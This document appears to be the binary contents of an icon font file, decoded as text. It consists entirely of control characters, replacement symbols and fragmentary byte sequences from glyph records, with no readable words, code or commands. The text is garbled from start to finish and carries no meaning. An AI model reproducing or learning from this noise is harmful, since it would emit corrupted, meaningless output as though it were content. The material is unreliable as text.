G@5h[	\
[

M

S
GY@...1.10/+(#!
	
+64246;35467632"&=4&#"32#!"&5!!�l��0#}�9-#Db"1"#1*"11"�_#0�_&ll"1)}7O
bD}}#01"T1"��"11"$�����y&.?@<hh[[OTH%5#%	+2"&=4&#"32#!"&546;354264&"يa"1"#1*"11"�_#00#}�i,  , yaE}}#01"T1"��"11"$"1)}E� ,  ,����%H@E% BY[MSG#"	+2#!"&5463'!'"7'5!27%�#00#��#00#�A��A4���������0#��"11"w#0��9��92����@	������#(1@.('%$#"! Bjja	+"&54?>76/767'%*� ��3
�!��z}���Mz!��
���`
�
���x.}��7���+y����Gy*@@=@[[OSG
'$
+!"&463!2%"3!264&#!.'#!"&47��4II4M4II�M���"�"�k1"�_#0KIhIIhI�""��$���n#"11D��Gy*@'@jOSG
+%2#!"&463%#!"&47�"11"�_#00#�1"�_#0��1D11D1�#"11D��!9@6BOSG!!	+72#"&54672#"&546ʭ���c,,������c,,�����`,w,_����`,w,�
#@ BOSG%%%$+#"&54632#"&54632���c,,����c,,�`,w,�`,w,��P#/*@'[OSG+"&5462"2654"&5462"2654�hIIhIl"".hIIhIl""!I4w4II4��4���w��I4w4II4��4���w2�&@OSG+2"&54$2"&540F11F0TF00F0&1"��"10#N#00#��#00#N#�P(@%	BOSG
+>7/2"&546S#�$�#�nD11��`#�#�W��k1#�#1�P @BOSG%$+632#"'6M��:!#11#!������2"�`"2��P
$@!BOSG

+%"'67632M!��l!#11�h2"�`"2�P
@BOSG%!+7#"&54632�#"11"#� 1#�#1��2�&!@[OSG+"264$2"&4?�bb�b��В�В�b�bb���В��2�&@OSG+2"&4�В�В&�В���)@&
BOSG%%+2#"/672#"/67$��>,,��c���>,,��c����,��,�`J���,��,�`�#@ 
BOSG%%+2#"/67$2#"/67
>,,��c�>,,��c,��,�`,��,�`2�&(@%YMSG
+!!2#!"&5463���N#00#��#00#���0#��#00#N#02�&@OSG	+2#!"&5463�#00#��#00#&0#��#00#N#0��&",4>FNVk@h	?[
[
	[OSG65$#TSPOLKHGDC@?;95>6>21.-)'#,$,!
+2#!5#"&54634&#!"3!26%"&4632&"264"&4632&"264"&462&"264�4II4��}*4II4G���"11"#11""�#11#"11""�F00F1C""&I4��4I}}I4$4I�_$��P0F01D1}""d1D10F0}""d0F01DL""���P%@@=
B?[OSG%$
	+!";7!2654&'2#!5#"&5463q�}p4II4��}*4II4���$TI4��4I}}I4$4I�b�y-=�@
A	?K�PX@2
`[\	[		O		S	G@3
h[\	[		O		S	GY@<941(%" --
+2+'!"&55"&5463!235463!54&#!"4&#!"3!26k4II4*}��4I}4II4�4I���=+�)�!%��I4��4I}}I4}}I4#4II4���+>)��S#%����G�A��,BK�
PX@3	h`
[[OTH@4	hh
[[OTHY@
?>9832+)&# 
+$"&=462"326=4&32#!"&46;5.=46226=462i�bb�a�#11#"11�k}��}k�"{�z"�bE�EbbE�E�1"�"11"�"1��m�-""-�mSSVzzVS��G�3u�BK�
PX@*h`[OTH@+hh[OTHY@
#3)+$"&=462732#!"&46;5.=46226=462i�bb�a}�k}��}k�"{�z"�bE�EbbE�EEm�-""-�mSSVzzVS��/@,[OSG

+%!"&463!2%"3!264&#q�4II4�4II����IhIIhI�""��V@OSG+2#!"&5463G#11#�#01"V2D11"#1��A~ ,K:@7H9*)%$	BjjOTH"!B?!,",)+#"''.54?&5467676265'/64'$'&;254&547776.���_$ <
$�6*/$6f��1+���

����



��6BC.XxXC+W2?!.
q��I3uWWu5GQ�

�!;>C!Q"4y���y'7CO[gs�����@�	Y#	O

[	
	[
 
[%[O$![&"[MSG������ih]\QPED98�������������������zwolhsirc`\g]fWTP[QZKHDOEN?<8C9B63.+&#	'+2#!"&5463!!%+"&=46;2'+"&=46;2"&46;2#"&46;2#"&46;2#2+"&463"&46;2#%+"&=46;22+"&46372+"&4632+"&463A#11#�#00#N���N
*

*
}
}

}
>

*

*

*

�

}



}

�

*

�t
�

�


�

�

�

�

�

y1"�"11"�"1S����~~��

�q



S



}



*

N

~~��



S



�

���6P@M-, .!	BjjjO[SG541/)($"#%+2#"'#"&54675467%4675&#"2657&#"26G"2oMJ5X4MoF7*w�G6}���,=>V=�+==V=1"�YEa-(/bE5W� /4�/FH��5��1"#11#��1F00��q|&@#
@O[SG+6"&4635"&463467Z	IhII4�IhII4|
	�	+==V>���+==V=����#&0:DI@FD=;,+'&%$"!Bk[OSGCB97	+2+#"&776776'6'7%&6?'76&32?6654'&\Mp-�,Z&
��]K9�G#y?�r���
b�

	|%!Y �pM>-�Z]"
&J7��:G>�,�r��	�4�
�
+ ��� $(8@5('&%$#"!BjOSG  &++546762'27./7'	7'��8=��4�'4Y3��6*zZ3���6�64�8�>��	3Z3�7	>* Z3��C6�5��C�(2HK@H:9#"D+E*Bh[[OSGHFB@))'+#"/&4?627'&4?6327'&#"7'&"%>.'#"/32"	[J��kAJ%%B%f%:�:%%B$54$�-}-�.}."C�AN}�}(I��Eir�J�AJ%g%B%%9�:%g%B$$}#-}-��-}-B#&A|YO-}#�
~(����	+-@*+*	! BjOSG(+'&4?62'&54?62#"/7?654/7�B4�M�B5�TO��Q.����4C�r�BDU`�O�.��	����PDW@T81C<	
B[[	[	
	[

O

S
G@?54.-+2"&5"&="&47622764'&""'&"276726526=6>fJ%&2IhIIhI3J%Y�Y,u
 
'r'@�@"".B"BJ34%'�4II44II4�Jf%YYv#

''@@#	��F	.
��
2G�%D@ABhhOOSG%%+"&=&'&'"&5"&4762276/.C"C."#@�@(o(�#.
��
.	��F	#@@((����!,5@2%$+B?O[SG)++#"/7'.7632?6767667'#4�
U)/$&�ߟ�	7uP	7'G4+r�7V
`�M�E
);Rs$/��߆14(S��V6�u+-������y@B?ja("+%#"/7'&7632767>�
����
~ZH1,�f$-2
����-$e
�,2GX����+086@354&81/.BhkOSG%()+#"/#"'.>76?'&462676327'76?'�/3*nC�&-O!>
�
#D*)MI��Ye�ڕ�
s/�)!)C#�A@?"&�#Dp(4�ZeY
ڕ��<;�*S[B@?QP>=6/*#B[[OSG[YWUGE32'&+//"&'&6?5.6?54626&/54&"?7632>&/5432#") U.p%%\+0+\%%p.T&)�VxU�
�%2&�
�D
 #3*

 
D���[,+)
 #_())(_# 
)V\v�<VV<����%%��>�6
!	!
6�>�����$-D@A$
BhfiOSG&%+)%-&-! &+%#/#"/&'&6?5.6?5462'2654#"��DYXD�
�%2&?	�>>�67$$


6�>��%%��	��G�+/37=E|@y

B	YY

Y

YMSG4400,,DC@?<;98474765030321,/,/.-(%"!
+++2+"&=.'546;546;23546;2'35!355#&267!%5!!6	XE1#S"1F[)SSS}S��S}S�n�t��_�&�N{ �#11#� |M�}}}}}}}}}�<SS�R@?}ii

����7E@B		[
[[OSG7631.-######
+"&57"&4637'4622#'26=3264&+54&"#"3�hI~4JI4IhI|3II4{�"��"�KI4IhIz4JI4{IhI�3��"��"���y0@-O[SG
	+2#'"&57"&46;'462G#11#�1F0�#00#�0F11D1�"11"�1D1�"11"���A�'1;EOsw�@�q
hV_B
[


[	[[OSGttQPGF32((twtwvuomca][PsQsLJFOGOB@=<862;3;(1(0,+%##!#+"#54&";#"26=3264&+532645462#!"&4632"&=32"&46;2#"&'#"&5467.54632>#5�xVSVxVV<??<VVxVSVxVV<>><V�$4%%��%%%R4$>%�J%%?%]^�4--4�^9b  c9_�5--5�_9c  bYSyU<??<UUxVTVxUU<??<UUxVTVx{?$%%%4$%?��$?%%$4%?%��^9c  c9^�5--5�^9c  c9^�5--5��TT���y'1;EISv@s	[
[
[

O

S
GKJFF<<PNJSKSFIFIHG<E<D@?:9530.+)$# ''+#32"&=#"&46;5#"&46235462'3264&#"5#"2654&"35##3264&	??<VVxVSVxVV<>><VVxVSVxVV{?%%%�>%%4$$4%%�S�?%%%VTVxUU<??<UUxVTVxUU<??<UUxV�?%4$%�o?%%$S?$%%�TTS?%$4%����"7UM@J
0#B	h[[[OSGON&)$
+#"'&547654626%26=4&"2764'&'#"&5"&54764&"32654'&"]g�ghh5HIhI E��"")
++)|)++1#"1��o7#PPOpq�O#7#g���gh��h54II4
���+x+))+x+2"10#��oMN7"PopPO�qpO"7NMy*8@5h[OSG&% 	+%2654'&462#"&547626"&=462Lo7#PPOpq�O#7o^""moMN7"PopPO�qpO"7NMo�������3ALWa�@�=8BYO[

[		[[
[

O

S
GYXNMCB54]ZXaY`TQMWNVHEBLCK<94A5@1.+*%"35+2#!"&54635463!2!5"3!26=4&##!"&526=#!"'32+"&5432#!"5432+"&463G4II4�64II4w��$��%�%���"�`"9�	�	����		PI4�_4II4�4IS*��}i%%i}�����	��	�*����$w����@��x�yB

[		[
[[[[[OSG���������������������~|zvsmlfc_][YVTRPLICB<9"#!%2:"'+547&=46;>232+"'+"&5!54#"#"&463232=4&+"&7654&"+"327632#"'&#";26'&5462;266323264&#"#"25#"'&#"32763&7654&"66V<e�e<V66V<rABr<Vq
++	%r
7N7
r%++%r	
7N7
r%��
��C,�AAI<V>TT>V<IAAs<V66V<s7N6I%**%I
6N7s%**%B,?B,���dOC@@	
[O[SGHE?>85.,)' 
OO+"3276+"&7654&"+"&=463264&#"&=46;26'&5462;2'&�++%r
7N7
	s$++%s	
7N7
r&K6N7
	s%**%s
7N6
	I%**%I
���d3Oo@l@;0*)B9
G4NIB	

h
f[

[[OSGLK>=33%
+  &264&"%35&".'3654'#>7326=.467&'"&'>26�$��������**%M4	B	4L$**$L4	!4M>  ,6,!!,6,d����$�`���	! 	5L$**$L5	 !	5L%*%M4y,6,  ,6,  ��G&/;@8)B[[OSG#&#&+"&46232+5462>7#"&46;.'"&5���>W
OO
X="=Y
OO
X>"!���E
W>">X
OO
X>"=X
O���P4Gp@m
B
`O
[[[
	
	[OSGED@>9742/-('" 
+2 &63264632;54#"&#"27676&#"#"'327>?#"'&?"-+B���ÊJE'��V;."=#�0ATdGFFG�G
C%;,<+*
6A+
0PB>ΐ���  �pvV; �,03GF�FGG4&�+<'&+��#_@
 BK�	PX@`[OSG@ h[OSGY�$&#"+3267>"&463276#"&?&#"aV;%B
)
GȎ�dTA0$�#=#-;5vV%	&G�Ȏ30#�$=���P):J@G
	[		[[OSG7520+*&$!
+2#!"&5462654&"2654&#"322654.#"32}nɑVI4��EbI<D10F0�4$�p$$<V�4%v�w$$��PV��n4IbEw4I��1#"11"#1%p�%4$V<%%v�u$4%�����y(?@<[	[OSG	%#((	
+62"&42"&54&#"&462"&54&#"&460F11F0S�
�1F0�#00#��1F0bE#00�1D11D%���"11"��1D1�Ê"11"Eb1D1�af�>IT]�u@&:1	�f	*

�l)
x BK�
PX@Uh		fkO[[	
	[

O[

S
GK�PX@Ph		fk[[	
	[

O[

S
G@Uh		fkO[[	
	[

O[

S
GYY@<_^KJ@?������|zvtki^�_�[YVUPNJTKTFD?I@I976543-+>>+"'".'&#"327>&'&'732654'67263732&'&'"&?632!"&4632"&5432#"'#&/"'.6767#"&4632676?6�
;!NP!;.BB.:!E C��
?GE!:.A
+a

�O
�	
X2sP2 +2KJ3*&+PrrP/T$ 5['D
2��2B\A0m$Z J��+'/ePm0A., 
�&
%%
&�
	�
F7PsB3$VN+")��)"+NV$;:s�r+'>7K���q<DNVZ@W2&%
	B		hfi[
O
SGTSPOKJ)#+$)+'&#"'&/#"'.6767'#"&4632>?6;76264&"2654&"6264&"�
%M71&- $0Q��

K3&17MM7B,,,(D-l��""��"":
"(7M!13+:Bw	
��	--5p;2!MnM;ZZ9�""�		�""���y#)9T@Q	B
	[		[[OSG$$850-$)$)'&"	+2#!"&5463+"&5#"'3!26265754&#!"3!264II4�_4II4�?VxU?���=V>��_�yI4�64II4�4I��/<VV<��5+==+SSS	��"�!%)-26:BJ�@�B[Y
	

Y[[OSG33JHFDB@><:98736365421/.-,+*)('&%$#"	!!+2#!!2#!"'4&'#"&46;2#3'#3#3'#733537#432#"%432#"�*�(��6N:]	���}}}}��}}oЃ���>??>w>??>P��*"�"0TSSS*S�T*SSSS�u>>??>>?����3;CK_@\
	B

[[

[	[[OTHIHEDA@=<9854&$%"$"%+2#"'#"&5463263226=4&#"3276#"&54264&" &6 "264#�j&%#00"Q<;QV<,&

19Mo�""����6����nN
*1"#0H

<VU=<V!oMNx""���6�������	����'-9AG[@X6.,*(&$ FDB@>:0Bh[[[OSG=;97,	+ &6 "264$2"&4&'6'&#"6'7&67.'#"327&'67&����6���}������1%;@08 (0�ISS �2;`AC019W�F<4K�6�������l�����ZH52$ 	� .68(R#9vI5Q#
�"
>CP+O
A����(07I@F($"


641/-) Bh[OSG,*'%++  &&'6'&#"6'7&67&'#"'327&'>7&�6�����LAYkN^+,B3U�>U
��3�G_�jp'-cSm33
,��AQhc*�����6}jIU36�9
L]1goD=^�lR�92�Ixy5�$�Mp����/=@:+Bk[[MQE'!#&$	+#"'&54763246;#"3#67654&#"5#53�nܛ�nmml���>/::
SS]GV�xz�UG^SS6n���nm��mm��1ET
:S�GVxz��zxVG�S��wy,@)k[MQE!%+3###5354676;#"�}}}}}.FWW}��#}5(R3}����"*2M@J[	[[OS
G0/,+('$# 	+"'&547632"32654&"&462&"264"&462w�nmml��mnܛz��zx���V==V=N4$$4$�V==V=Knm��mmmn�����zx��xz��t=V==Vi$4$$4�=V==V���%@"[OSG+6"&462&"26462"&4�bb�a�F11F0ߊaa�b�b�bb��1D11D�b�bb�����9NY`@]6-3/)	B[
		[
[[OSG;:YXUSPOHFEB:N;M+�%+ &6 "2644632"7#+'#.547&7676326?27654&'&#"/&3'2#"&463����6���hEAAE(5!2!
�E!#	M  &"!E?K�6���������!.ELMD.!%#�2$#3r5G#	-CNJ@G%!
B*@[[	O	SG/.NMJHED;6.C/B+�#"
+$4632#"+/.547&767632676?27654&'&#".3'2#"&463_�/N4N dm/:W23%&%�j56, zA'.!53kb�,##,#4G�:'wjG4/4%<(1.��O":
.O�#,##,#����*7LX`h8@5(BBK�
PX@M[[

	
	Y[Y[[OSGK�PX@L[[

M
	YY[[OSG@M[[

	
	Y[Y[[OSGYY@+98,+feba^]ZYXWVUTSRQPONM@>8L9L20+7,7%$*+%#"&54763&547#"&5476;#'2654&#"2654&'#"7#53533## &6 "264�
F;35%)7&-!#4d!


2""!"%	0�***))*����8���%7)$0(!"
)!;:�"�*))**���8���������iP(8GS�@ML	BK�PX@B	`h^[
[
		YOSG@C	`hf[
[
		YOSGY@ :9*)SRQPONKJIHA?9G:G20)8*8%*'+%#"&54767&547#"&5476;#'267654&#"2654&'#"#53573##A	udT[>/p>K28Z�22;K
 	:."	909@#53$0QTTT)TT)�=]C2@$
P2@,.0@0
G*3c
!1a��1'('
(&,8,*OS*S����%|K�
PX@0`[	Y[OSG@1h[	Y[OSGY@
$#%
+  &"26473264&"265#"&5#�8�����F00F0"&��}b�b}�����8I1D11D�&� �zEbbEz����!1�K�
PX@3`
[	Y[OSG@4h
[	Y[OSGY@#"-,*)'&"1#0 	+2#!"&5463"26473264&"26=#"&5#3q5HH5�5HH5/jHHjH!&\Tx�xT�H5�5HH5�5H�HjHHj�&���XxxX�����Pj@gA'&@Bh	h[
[OT
HPOJHDB?=9731*(%#	+"'&547632"32654&254/&54327&#"#"/.#"327'#"&546323w�nmml��mnܛz��zx��S5)AG.+5$*(64'&	
TKnm��mmmn�����zx��xz��{7/4;+
3((!<*(6#%$(G~q�98@5)(B[OSG%#&%'#'	+%254/&54327&#"#"/&'&#"327'#"&5476323ݔ^/'16Hu~R12M^" IC230/DB(#.*7 &*'�~cQ

 %*[hJ	!'[HG11RM-. >#A.>0G~����'/Y@VB

[[
[Y		O	S		G
-,)(%$! 
#+%#53'4632"2#54#"#54'36 &6 "264%CCE$H�&(D!D:q����6����="!4+�y0~�8
#�4�6�������IPN@KBh		[M
[QE
	+7#32#54#"#'336%432#"}};FI}=1}c+��A@@A�
ZN��W1��w*SFu??>����HR@O'$Bh[	[[OTH;953-+HH
+ &6 "264%2#"&'&&5&?&5463232654&#"'&546����6����<MA4	
'0*0;-SK�6�������.J2@U
&-u !:C0$/=+A3T���Y5>@;	Bh[OSG(&" 55+2#"&''&?&5463232654&#"'&546	g�pX4
3
/*$3BQIReL�Y~Vo�V:@U8�#)7+9+tR?OiI+

nX�����Xx�@�
sc
kB		h	f	f[[		[

[
O
\
S

GZYnljh^\YxZxVTFD@>970/(&" 
+2654'654'&#"&#"327'463232654/&#&'.54632#".'&#"#"'&2632#"'#"'&547&5476�B_QPt(/C^RQt%"�
-.(* &XBF*#5(N<
[Gh*6/�jiGHe1)�kjFHcC$'wTSaD/&vUT�#	/"77!!
	+$<?@�mn�$**fIJmm�,6fHJ����\X@U		B[	O		[[
[SG! VTPN?=8620 \!\"*"%+%#"'#"'&547&5476326322654'&'&/&'&5463232654'&#"#"'&'&#"�GHe.,�kjFHf6/�ji��G[*N
)5#*FBX% *
(.-
&*�*)gIJlm�,6fHJmn��?<7		+

 !77"0	"3����$,�@BK�
PX@6`f		`[[		O		T	HK�PX@7hf		`[[		O		T	H@8hf		h[[		O		T	HYY@
*)$"
+%5#"&'&=35#5#3327 &6 "264�
LL-#2("8����6���4R3R

-q5��6�������J57@4BjYOTH&"+%5#"&'&=35#5#3327J)(&}}J
:% &D75V/�S�4*L�<!
	����*9E@'
#!BK�PX@=hf^^[	\		O		T
	HK�PX@>hff^[	\		O		T
	H@?hfff[	\		O		T
	HYY@;:,+A?:E;E42+9,9#"-+4626767#"'327.'327.5&547&"'&547632"32654&|(:
Y-<90/&#
7V�nmml��mnܛz��zx��Z(
	j:%#D�bnm��mmmn�����zx��xz����\+F@C(
	$"Bjh[OTH"."+46326767#"'327.'27.5&547&m[@D+023+-.00Ѕ�jkS4M
$4F(E~��@Y/
6/"m_a�EA>-T:0Q&&�����%-5�@BK�	PX@=hfff		f[		O		T	HK�
PX@Chffff		f[		O		T	H@=hfff		f[		O		T	HYY@
32#%&"
+>32#"'.'&#'76723276&#" &6 "264�3>
2.(-/)
x����6���W/C?=7#�4 +A:$�U�6�������3D+%@ @a+'&'&'&'7>763276&676DYXH* 
O3	T!,
	9.1#ALP�zji1$

	!A	4N$yl1@2#E����'0ELTdpy��c@!yvs\W&,-! 

BK�	PX@p`h

hY$[#[
 YP
Y"!	ZOTHK�
PX@|`^h`

hY$[#[
 Y"\
Y!	YOTHK�PX@p`h

hY$[#[
 YP
Y"!	ZOTH@qhh

hY$[#[
 YP
Y"!	ZOTHYYY@S��VU21����������xwutrqonihba_][ZYXUdVdRQNMLJHG=<651E2E%$#"''
	%+753##553#5&=3672#"&/#53654&672#6=3&=46354#"  &2735##"=#'26=4&"'#357#>574'.#'"32"=432�Z|f



T2
&&
��6�����!!	!j""W&(%'&5

d-.�	
d-.��

���wc�		
mdk H

�8eDQn!	

:&

�����6E�n	pznGGHsRRsI�?	?h		?g	pO

O�P@BOSG)'+! '&'&47676! 7'�		����z{���F�F7:j>�>j:�������&0BNd�@�	B

hh

[[
\	Y		O		T	HPOEC21`^[XUSOdPcKHCNEN@?=;761B2B0-*)$!
	+?#"&/##"&'&7>26;&546;22+"'26'&"32?373264&+"264&+6&+";3�:9�$0$;_<$,?�<H<K I4�$<".d4II4�0w
�4�
�Y**s������ss� %  %0%1/M$$�#04I% F=�IhIS(N��(<<�""�"-"��,2��+7O@L	B	[		[ZOS
G.,41,7.7(&# ++"+%#"/#'.7623'#"&7#"&46;232%#"&46;2�
�!�6
_s:��ȧ�ȧ��TTn(<<!N�s��,
"-��"�""���&(<]��@�6	
c
B!
A		h

h	[	
	[[[
O
TH���|zwurpnlig_^ZYTRLJGD>=:953-+	((+2632632#"'+"'#"&=&'&6?64&#"3272652;264&+7654'&#"26542654'654&#"327632#"32"&54&"�%=B[^@;ZRt	�[>4$0�1##04I$!-:Q	
9	
"�.!��l`))'<;')"5pO+D/E!
	

,"&&@@DtR49[!!  I4�!/a
}!��#!.�3"`)9:)''):��O8;(%/D>)",82k�3^c@`
4	B
	
	h		h
[
	
	[OS
G[YRPMKHFCB>=980.('"!33+6"&5&'&6?6#"&?654&""&5476232%"&5462264&#"&463264&#".7632�"!S'M�� /")(u())`l:,OpP",

!!E/C2
!)��3� :)(():9)`"�):8OO8,"
!>D/%���&GMR@O;MKJHB:870$Bh[[[OSG)&#*#&"!	+7432#"#'#"&54767'4763262327676732654'/7&#"&'�)**)<5POpn=bVzJV[OPpWI"�|J3:%)74MnuhwMoB<<-X+q7�**)IWpPO�!JzV^AIApOP5"�3J-/JEoMsht	nM2-2'](o6����#+3@0!Bh[OSG+%$+#"'#"&547>7&5463276264&"�{V^(,C<V3/~zV	oPm	�	""AVz|/4U<C-(]Vz
	lOj	�S""���J.@+JBjjOSGBA%#+6&'&7>'.6765462#".47>'.7>'"&76{#UZ4R[�YP]	�[X�/2
�H�_=&���-/A?�LG7#sp;%4?>4@'4\>�P\W�V]�JKOO%��:a�GRfHPM�A?43�I/#'4K@(X-���+%@"+"Bjjja'%$+&7>73?6323/#"'&?�O#O�"#	4) %��
 )I,�!�D4
�-``
,����+:6@3:63+/"Bjjjja-,'%$+&7>73?6323/#"'&?2.5&?'&/�O#O�"#	4) %��
 )�	���GI,�!�D4
�-``
,�G	W"S3
t	���\y@
	?ja+63'&57&'&746376G	uK-_C

�6m��B*�\:

y��� 7$@!51-)%	Bja  +"/'&?.'&76?63276'&?'&/P��&!(b)�R$%Q�(�($��
��#��	HH
��J	aa(�X$$�%%�$%��/3T VV�v��v���x@
?a+762/&?&'&67�[[�X

�,�sM-bA

���

��mA,�Y<	��A�<v`@]RNJ2-)\A<#e	qlf
B		hO[
YSGvtjh*.-'+/#"/&/.?'&4?'&6?>76276&6?'&?'.///76327>7>?/M)\$S4

3S%])MM)]%S3/4S&\)[
88C< %% <C	
77
	C<
%%	<BO.3S%])MM)]$S3
,
3S$\)MM)\$S�	%% <C88C<	%%	<C87
	C���;>@;62-#
BOYSG870/('+/"/&/.?'&4?'&6?>76276�\

\1
oc>>cn
2]		]2
nc>>co

{>>cn

2]		]2
o
c>>c
o

1]		]1
o�b��&.?GO�@

BK�
PX@Fh
^	
	`[

	

[\[OSG@Hh

f	

	h[

	

[\[OSGY@MLIHEDA@=<3##3'+ &5467'5#"&46;2+?62264&"%32+"&=462&2"&4264&"�B����)�)}[#�J��NS}"�Γ�Γ��zz�z�^v��ܛ��)"")V#����"}}�Γ���{�zz�
����"-27?Gl@i;8/?<20.

GD753! 
C@6"B[[[OSGFEBA>=:9+)%$+  &4'$7&547'67'&'62764&#"%'7&"6227'"'�$����qPP�QQb%J;�$J;K0G1#"1,;J%$J;^:�:Q$�:�:P$�����$ӂ:P,P��:QP'%J;��'J;�0D11"�;J%�'J;�Q�oQ���y )�K�PX@1`	Y\
[MSG@2h	Y\
[MSGY@!!!)!)&$#" +2+#!"&546;5463!4&#!!32q#00#S1#��#01"*1"}w���_�%y1"�_#0*"11"w#1S"1��b
��}%��bk�
%-D@ABk[[OSG+*'&#"

+"'.2"/&/&47"264&2"&4$Wz=�$��:=��VW	��F�}UU�4%%4$iV==V=yz�=|�$'<=TVZ��D���}U�U�%4$$4N=V==V�8A�"/7?T@Q,%$BAk[[[OSG$)%*	+"'&'&547&7632	&#"7&#"632"264&2"&4)-��F�\U+ZUyzU{#��=VWz=\�-��=WV=EPx^4%%4$iV==V=�D-E���YUyRE�ZUU��$=z�=Y��-==#)�%4$$4N=V==V��A�#'7;KO�@}Y[

Y		M	S
		GLL=<88)($$LOLONMEB<K=J8;8;:91.(7)6$'$'&%#"	+2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#$"11"�#01"���"11"�#12"��"11"�"10#���"11"�"21#���1#�#00#�#1����$1#�#01"�#1���Ч0#�#11#�#0����#0#�#11#�"1��������/?*@'[OSG55555552+46;2+"&5%46;2+"&546;2+"&5%46;2+"&5I4S4II4S4I�I4S4II4S4I�_I4S4II4S4I�I4S4II4S4I&4II4S4II4S4II4S4II4��4II4S4II4S4II4S4II4��A�#/;GW[ko��@�"
	
[#		[ [![[OS
G��qpll]\XXIH=<20%$
������yvpq~lolonmeb\k]jX[X[ZYQNHWIVC@<G=F850;2;+($/%. ##
$+%!"3!264&'2#!"&463%!"3!264&'2#!"&463%!"3!264&'2#!"&4632+"&=4635#2+"&=4635#2+"&=4635#��#4II4��4II4#��#4II4��4II4#��#4II4��4II4�#01"T"10#TTT#00#T#00#TTT"10#T#01"TT2""SIhIIhI�""SIhIIhI�""TIhIIhI��1"S#11#S"1�SS�1"T"11"T"1�TT�1#S"11"S#1�SS���%)-1s@p[

[
	[		[O[SG..**&&
.1.10/*-*-,+&)&)('!%$
+%2#!"&4632#!"&4632#!"&463424242�"11"��#12"$"11"��#11#$"11"��"21#�t�����\1#"11D2#1D11D1$1"#12D1����$��$����A�#/;Gs@p
	
[		[[[
[OSG=<20%$
C@<G=F850;2;+($/%. ##
+%!"3!264&'2#!"&463%!"3!264&'2#!"&463%!"3!264&'2#!"&463��G4II4��4II4G��G4II4��4II4G��G4II4��4II42""SIhIIhI�""SIhIIhI�""TIhIIhI����
'A@>[[OSG"'&
	+%2#!"&54632#!"&4632#!"&5463�"10#��#01"H#00#��#00#H#01"��"10#\1#"11"#1#1D11D1$1"#11#"1��A�#'7;KO_csw�������@�4 .("

Y5#/)!		[2,&Y3-'[0*$Y1+%M1+%S
G����������yxtted``QPLL=<88)($$�������������������������������~x�y�twtwvumjdser`c`cbaYVP_Q^LOLONMEB<K=J8;8;:91.(7)6$'$'&%#"	6+72+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#2+"&=4635#�#01"T"10#TTT#00#T#00#TTT"10#T#01"TTw#12"S"10#SSS#11#S#00#SSS"21#S#01"SSw"11"S#11#SSS"11"S#11#SSS"11"S#11#SS�1"S#11#S"1�SS�1"T"11"T"1�TT�1#S"11"S#1�SS�_1"S#11#S"1�SS�1"T"11"T"1�TT�1#S"11"S#1�SS�_1"S#11#S"1�SS�1"T"11"T"1�TT�1#S"11"S#1�SS	���#)�@�
[	[OS
G$$$)$('%#"!

	+424242424242432#432#432#�����T�����Sihhiihhiihh`��$��$�����$��$�����$��$������!16@3.'B[[OSG+7"&54675462"&5474622654'4&"�$2D1$
}?{�z>VxV�hI>%4$?�,"21#,�

�?TV{{VU>L<VV<��I4F%t%%��%F4���y$GSQ@N#@	B[[[OSGRQLKFE42 $$	+2#"'"&547&'.?>?63264>76=4&'.#"726%54&"26G4II4=&"!=V>
�")
8PB�%�#
x6=+
�7
$""PI4�4I2"C6+==+LK= �3
) ��+F7�	"�
;bP

���Y��-8{��@�XP)DB	`Aa4	?hff
	
	h		f[[
[OSG||:9���}||�|�qoki\ZUSLJA@9{:{&$! +&/&767>7>?>632654/%26'&'&"567676&#"76&#".#"67>7654#"#"&5476"'&#"3276�-F,n% 	D9�:6z 
*6%
	#=7K"G7�>2
��+-+
dC	E�3[2	')1
	8DV:	I�CB�6
7R)2?d;K%71%�V
�"�$�%	xd	6�%T�"%!/ 6	


&����$0RF@C#8B[[O[SGNL>=%$)+#"&/#"&=4632>546226=4&"76'.'7654&"32?>�!)
8PB�%-4II4=&#!=V=
���""�7


#x6>+
�< �2
) I4�4I2#A6+>>+KK�����
;]U

+F7�"��aP'3@0&BjkOSG	+"/&547627>32"676&'&'$5$�%%#j#2�;"FK$�#�"
�)
�	!��!$�%34%##2�#yA��@M
�w 
�����#@Bja+"/&462>��)"�2DY�DD��$�D2X��W�.26I@F6153204/*$Bhf[OSG%%+#"/&67664/.7'&#"6?'77'3$$��&24%�$$}#k#�5B06��5B5$��������$i$��$%�$i$w##��"50B5��"5B5w���!������y'/7�K�PX@?`		h
[

[[		\OSG@@h		h
[

[[		\OSGY@5410-,32++"&46;2&"264$  &4&"2656"264$2"&4}}��A6�����"",�zz�z��Γ�Γ""��������6}�{�zz���В��GN"D7@4<3+# B[OSG+%"/"'&54?'&54762762%2654/7654&"'&"27GJf%NO#j#%%NN%%#j#ON#k#$$OO$�݉#��#��"

��

"�3J%NN##%34%NN%43%##NN##$45$NN$7�����

��

��2�'%@"BOSG+"/"'&4?'&4762762�llFllFllFllFDllDllDllDll��qy!+7CO[e@bY
[

	
[		O		S	GWVQPKJED?>9832-,*'$#!! +2#+"&5"&46;5463!2%!5!;262"&=462"&=462"&=462"&=4GaE�Ea)1###1��#*��1"�"1��
`


`


a
�"��EbbEM"*"11"****�6M��#111�

��

��

��

��b��3H@E&
B
j

h
f

O	\

T
H10-,"#$##"+%#!"&=!"&?#"&77>+3'&6;3235462���"��q'$*
$'��q-��-q�"L.}}.�*��_*}�..��.���b�/;?U@RB/(!@
Y[		YMSG00?>=<0;0;874321+*%$3+%#!"&=4?67&672?26=264/!'#"&=!5!��fS!��!T��#_"_#��EBE_IhI�H��\���%]!��!]%�#_��_#����4II4��}����5G@D0' @	
jhYOSG+)$#55!$3+%#!"&5434?6;#!'#532"/"&5#"'&4?��fT
��EBE��
T�_"_�����	�S��S�I`��`#��#��y'0<��.+	BK�
PX@5`[
\

	
[		O		S	G@6h[
\

	
[		O		S	GY@&21)(861<2<-,(0)0%$! 
+%#"&46;2"&=462"264&2"&4"27.'2#"&546��}""��hIIhIӬzz�z�;T<�;S:m��kp���""}���IhIIh�z�zz��]$%SeB!22!Be��y/J@G	O[O		[S
G	,+(&#!//
	+"&462"&546322+"&=#"&46;5462�z�zz�Vp��pm���S"SS"��zz�z�<2!BeeB!2w"TT"SS��y$0Y@V"B[
[[		O	S		G&%,*%0&0! $$

+%#"&46;2"264&2"&4"27.'2#"&546���/hIIhIӬzz�z�;T<�;S:m��kp���""MIhIIh�z�zz��]$%SeB!22!Be��y;@8O[OSG
+%#"&46;22"&42#"&546�����zz�z�m��kp���""�z�zz���eB!22!Be���y$J@GB[[	[OSG $$
